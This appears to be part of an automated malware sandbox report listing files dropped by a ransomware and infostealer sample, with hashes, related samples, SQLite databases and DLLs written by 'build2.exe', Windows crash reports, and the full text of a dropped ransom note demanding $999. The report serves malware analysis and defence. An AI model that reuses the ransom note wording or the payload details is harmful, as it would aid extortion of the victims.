	Purchasing_49427020424_8568658.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	23.47.27.74 104.21.65.24

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.26032.23589.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.12246.12715.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exe	Get hash	malicious	GCleaner, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	e8iuAWz9pB.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	gVnbOPz4F2.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	5zq2Yob8xh.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
C:\ProgramData\mozglue.dll	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.26032.23589.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.12246.12715.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exe	Get hash	malicious	GCleaner, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	e8iuAWz9pB.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	gVnbOPz4F2.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	5zq2Yob8xh.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse

Created / dropped Files

C:\$WinREAgent\Scratch\_README.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.898906330049753
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNYbmFRqrs6314kA+GT/kF5M2/kJw3RJM:WZHfv0pfNAU5WEYNYbPs41rDGT0f/kiK
MD5:	3B2A0B49205B9CD88C25B002B4833C1E
SHA1:	2A70E9920219D56555B04FADEBA8D3F75B49692A
SHA-256:	6F18FF96ADA23362DCBD8019D3B15E6AF306EE2BBBB5EEF7821C1200782E990E
SHA-512:	B9FCEE7033CF68B5AFD15F8679C6F6B9717C1EA2B3D4C324410A8809D6054FA44D7D4DC103DB691734C51DE8C3FABD13F1C3E62B4C9F6B0C9BA731FB53A6DC93
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\$WinREAgent\_README.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.898906330049753
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNYbmFRqrs6314kA+GT/kF5M2/kJw3RJM:WZHfv0pfNAU5WEYNYbPs41rDGT0f/kiK
MD5:	3B2A0B49205B9CD88C25B002B4833C1E
SHA1:	2A70E9920219D56555B04FADEBA8D3F75B49692A
SHA-256:	6F18FF96ADA23362DCBD8019D3B15E6AF306EE2BBBB5EEF7821C1200782E990E
SHA-512:	B9FCEE7033CF68B5AFD15F8679C6F6B9717C1EA2B3D4C324410A8809D6054FA44D7D4DC103DB691734C51DE8C3FABD13F1C3E62B4C9F6B0C9BA731FB53A6DC93
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\ProgramData\AAEGHJKJKKJDHIDHJKJDBGCGCB

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFHDAEHD

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKEBFHIJECFIDGDGCGHCGIIECA

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03799545499236577
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZru/bNb/fc3DDTnHI:58r54w0VW3xWZrwbFHc3T
MD5:	96AB9233CA2AB3982F98B1BA44CFFE32
SHA1:	A72C6AF1881274392B7D73594D78C4D3F1B91428
SHA-256:	C764FE5DA2665335A3C2E60091F08E21A16CEC35EFD453AE092FEB1D7C3D69BC
SHA-512:	E09E96834C049E56FE5E9A56BA1635CA6A4FB5DF2F2EB8F339C94D4BCF2D24150592B2833D084BD4BD7D0319B4D5C493B5B49A64310E084684375D645DD8CEEC
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAAAAFBKFIECAAKECGCAAKJECB

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8517407251719497
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
MD5:	D0962B221779A756754334848DCFF184
SHA1:	22CD3B9D687216E6921553F55958449CE7ABF05D
SHA-256:	7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
SHA-512:	05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBKJEGCB

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFBFHIEBKJKFHIEBFBAE

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCBAFIJDGHCAKECAEGCAAKEHD

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHCAEGCB

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1368932887859682
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
MD5:	9A534FD57BED1D3E9815232E05CCF696
SHA1:	916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
SHA-256:	7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
SHA-512:	ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDBKKFHI

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAKFBGCBFHIJKECGIIJ

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_c21224191a167f50d0fc77956927dc29a8d71181_f78a65ed_2e679ee0-d432-4257-92dc-1d440912c762\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3892732247429485
Encrypted:	false
SSDEEP:	384:V/C14Wbk7jgWMAhHERJ007IqzuiFhY4lO8k:V/HWbk7jUAh+JF7tzuiFhY4lO8
MD5:	053462864DFEB8FC997F53C1AE91596A
SHA1:	96C56AC676804039CF8EFE4EB5627802FBDB9BEF
SHA-256:	92EB3EC9053DBD07BF6D7F79250A693B7D4E99686819AE308A16EC4FD99290D1
SHA-512:	58238C852401620B3D0AE48586CD3EE4C23D60A369B4E5B174DFC871795EAADD1F04BAD3DA1255DF00991A6D9C5E9B5351C2A3E0B548225D7798DD38E87D4698
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.7.1.9.3.6.3.7.2.2.0.3.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.6.7.9.e.e.0.-.d.4.3.2.-.4.2.5.7.-.9.2.d.c.-.1.d.4.4.0.9.1.2.c.7.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.9.4.5.f.d.e.-.8.5.e.0.-.4.f.1.5.-.b.5.c.3.-.5.e.0.2.6.7.4.0.d.d.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.8.0.-.0.0.0.1.-.0.0.1.3.-.5.c.2.0.-.0.c.c.6.9.a.8.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER82B4.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Thu Apr 4 15:49:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1092800
Entropy (8bit):	1.3993759000683643
Encrypted:	false
SSDEEP:	1536:4LEsGtlsD3VXjHYuEFBY6sosVUWgWLraw46k3qz8QflR8kLKe4IDZ21+JcQR:4LEsGfsrVX7DOsZN/a55qzf7LI0L
MD5:	72B1E5B6380AABD694A86F2014E15120
SHA1:	2C0522B0BD978EB3CCFFFEB1DCD40D52A31395EF
SHA-256:	85B25775EB1B3D879D104BAE500A100E6899938E9710B13F8AEDE89C53B80C1D
SHA-512:	1A3318B15EA327E9657AF90CE464C708C8C8D8ACB23ACAF0D0284DC6D1549D4E8CE05DE1B5215CA301E6300198870B7EE09B5AE7340B89ED5BC88AE39D2EA7E5
Malicious:	false
Preview:	MDMP..a..... ..........f................ ........q..@...........T...........P...........\|...........x.......8...........T...$...........!..................................................................................................................eJ..............Lw......................T...........b..f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER87E5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10810
Entropy (8bit):	3.6978158537516275
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2VQBpG6YZHugmfqipGpry89bY5N5PF2PC7foom:R6lXJEQvG6Y5ugmfqipAY1PF2PC7fe
MD5:	E1F444EA511074ECCDCB68AF83F45B43
SHA1:	3630A77DA6088AD29BDF9058A9B5BBAE3C6135E8
SHA-256:	67221A2F176AC8EED1625819193AF78B1127A4BBD0C7A71FD5E6CA96533DFA75
SHA-512:	67BEB60099C33A82EC416E26839AE03FB535A8500230C9CA0ECC108875EE7C9FBD53B61CD7AAD4DD523164E54E5D2834102D2F40B7B156FF7B995275E9B80B79
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8853.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.481033942474926
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg771I9ZeWpW8VYGYm8M4JYTFPGyq850P+2b9Q3jd:uIjfpI7yf7VGJeGC2ba3jd
MD5:	E521E1307686A5D9169EBD97D3B83918
SHA1:	C31373ACEDA002E0B9B8D462878821ACAB3FB0E9
SHA-256:	531B35170A2BF6BDB20A8DA0375DF68AD36A4C6874903EA70EF11B1F7E16AA76
SHA-512:	2A584B1EA392611FCBF29AB33C1DB2D5257BE9D9A85482C1C28A500DAE3A57E49A71178D418DF858F17A0FFC8F1A8F7EAD7531A5CBFAA0AA4ECECF883B117BC1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="265372" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe, Detection: malicious, Browse Filename: Grkradw6vd.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.26032.23589.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.12246.12715.exe, Detection: malicious, Browse Filename: 8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exe, Detection: malicious, Browse Filename: e8iuAWz9pB.exe, Detection: malicious, Browse Filename: gVnbOPz4F2.exe, Detection: malicious, Browse Filename: 5zq2Yob8xh.exe, Detection: malicious, Browse Filename: WAhYftpepO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
